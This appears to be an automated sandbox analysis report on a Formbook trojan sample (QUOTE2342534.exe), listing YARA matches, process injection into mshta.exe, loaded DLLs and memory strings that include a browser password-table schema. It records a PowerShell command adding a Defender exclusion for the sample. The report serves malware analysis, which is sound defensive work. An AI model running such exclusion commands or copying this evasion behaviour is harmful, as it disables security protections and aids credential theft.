            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_039081CC8_2_039081CC
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038401008_2_03840100
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038EA1188_2_038EA118
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038D81588_2_038D8158
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038E20008_2_038E2000
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0384C7C08_2_0384C7C0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038747508_2_03874750
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038507708_2_03850770
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0386C6E08_2_0386C6E0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_039105918_2_03910591
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038505358_2_03850535
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038FE4F68_2_038FE4F6
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038F44208_2_038F4420
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_039024468_2_03902446
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03906BD78_2_03906BD7
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0390AB408_2_0390AB40
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0384EA808_2_0384EA80
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038529A08_2_038529A0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0391A9A68_2_0391A9A6
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038669628_2_03866962
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038368B88_2_038368B8
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0387E8F08_2_0387E8F0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038528408_2_03852840
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0385A8408_2_0385A840
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038CEFA08_2_038CEFA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03842FC88_2_03842FC8
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0385CFE08_2_0385CFE0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03892F288_2_03892F28
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03870F308_2_03870F30
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038F2F308_2_038F2F30
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038C4F408_2_038C4F40
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0390CE938_2_0390CE93
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03862E908_2_03862E90
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0390EEDB8_2_0390EEDB
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0390EE268_2_0390EE26
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03850E598_2_03850E59
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03868DBF8_2_03868DBF
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0384ADE08_2_0384ADE0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0385AD008_2_0385AD00
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038ECD1F8_2_038ECD1F
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038F0CB58_2_038F0CB5
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03840CF28_2_03840CF2
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03850C008_2_03850C00
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0389739A8_2_0389739A
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0390132D8_2_0390132D
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0383D34C8_2_0383D34C
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038552A08_2_038552A0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0386B2C08_2_0386B2C0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038F12ED8_2_038F12ED
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0385B1B08_2_0385B1B0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0388516C8_2_0388516C
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0383F1728_2_0383F172
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0391B16B8_2_0391B16B
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038FF0CC8_2_038FF0CC
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038570C08_2_038570C0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0390F0E08_2_0390F0E0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_039070E98_2_039070E9
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0390F7B08_2_0390F7B0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_039016CC8_2_039016CC
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038ED5B08_2_038ED5B0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_039075718_2_03907571
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0390F43F8_2_0390F43F
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038414608_2_03841460
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0386FB808_2_0386FB80
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0388DBF98_2_0388DBF9
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038C5BF08_2_038C5BF0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0390FB768_2_0390FB76
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038EDAAC8_2_038EDAAC
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03895AA08_2_03895AA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038F1AA38_2_038F1AA3
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038FDAC68_2_038FDAC6
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03907A468_2_03907A46
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0390FA498_2_0390FA49
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038C3A6C8_2_038C3A6C
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038E59108_2_038E5910
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038599508_2_03859950
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0386B9508_2_0386B950
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038538E08_2_038538E0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038BD8008_2_038BD800
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03851F928_2_03851F92
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0390FFB18_2_0390FFB1
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03813FD28_2_03813FD2
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03813FD58_2_03813FD5
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0390FF098_2_0390FF09
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03859EB08_2_03859EB0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0386FDC08_2_0386FDC0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03853D408_2_03853D40
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03901D5A8_2_03901D5A
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03907D738_2_03907D73
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_0390FCF28_2_0390FCF2
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_038C9C328_2_038C9C32
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F31B208_2_02F31B20
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F2CAA08_2_02F2CAA0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F2CA9B8_2_02F2CA9B
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F2CCC08_2_02F2CCC0
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F2AD408_2_02F2AD40
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F333608_2_02F33360
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F351708_2_02F35170
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F4B7308_2_02F4B730
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03B6E3748_2_03B6E374
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03B6E5FB8_2_03B6E5FB
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03B6E4938_2_03B6E493
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03B6CB2D8_2_03B6CB2D
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03B6D8988_2_03B6D898
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_03B6E82D8_2_03B6E82D
            Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 0383B970 appears 280 times
            Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 038CF290 appears 105 times
            Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 03885130 appears 58 times
            Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 03897E54 appears 102 times
            Source: C:\Windows\SysWOW64\mshta.exeCode function: String function: 038BEA12 appears 86 times
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: String function: 017AF290 appears 105 times
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: String function: 01777E54 appears 103 times
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: String function: 0179EA12 appears 86 times
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: String function: 0171B970 appears 280 times
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: String function: 01765130 appears 58 times
            Source: QUOTE2342534.exe, 00000000.00000002.2140837926.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs QUOTE2342534.exe
            Source: QUOTE2342534.exe, 00000000.00000002.2156658228.000000000B860000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs QUOTE2342534.exe
            Source: QUOTE2342534.exe, 00000004.00000002.2232503719.000000000181D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTE2342534.exe
            Source: QUOTE2342534.exe, 00000004.00000002.2232065125.0000000001197000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSHTA.EXED vs QUOTE2342534.exe
            Source: QUOTE2342534.exe, 00000004.00000002.2232065125.00000000011A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSHTA.EXED vs QUOTE2342534.exe
            Source: QUOTE2342534.exeBinary or memory string: OriginalFilenameiFFZ.exe> vs QUOTE2342534.exe
            Source: QUOTE2342534.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 4.2.QUOTE2342534.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.QUOTE2342534.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.4597123623.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2232369881.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2233350481.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: QUOTE2342534.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, b9hATX05wLpDVq4ne4.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, b9hATX05wLpDVq4ne4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, b9hATX05wLpDVq4ne4.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, b9hATX05wLpDVq4ne4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, RgTGNHbnx4wRLD1BjK.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, RgTGNHbnx4wRLD1BjK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.QUOTE2342534.exe.438b4a0.1.raw.unpack, RgTGNHbnx4wRLD1BjK.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, RgTGNHbnx4wRLD1BjK.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, RgTGNHbnx4wRLD1BjK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.QUOTE2342534.exe.b860000.3.raw.unpack, RgTGNHbnx4wRLD1BjK.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/7@16/11
            Source: C:\Users\user\Desktop\QUOTE2342534.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTE2342534.exe.logJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2360:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztmdjh4q.hu2.ps1Jump to behavior
            Source: QUOTE2342534.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: QUOTE2342534.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\QUOTE2342534.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: mshta.exe, 00000008.00000002.4592995544.0000000003029000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.4592995544.000000000305C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2413656101.000000000305C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2413656101.0000000003029000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: QUOTE2342534.exeReversingLabs: Detection: 28%
            Source: unknownProcess created: C:\Users\user\Desktop\QUOTE2342534.exe "C:\Users\user\Desktop\QUOTE2342534.exe"
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe"
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess created: C:\Users\user\Desktop\QUOTE2342534.exe "C:\Users\user\Desktop\QUOTE2342534.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe"Jump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess created: C:\Users\user\Desktop\QUOTE2342534.exe "C:\Users\user\Desktop\QUOTE2342534.exe"Jump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
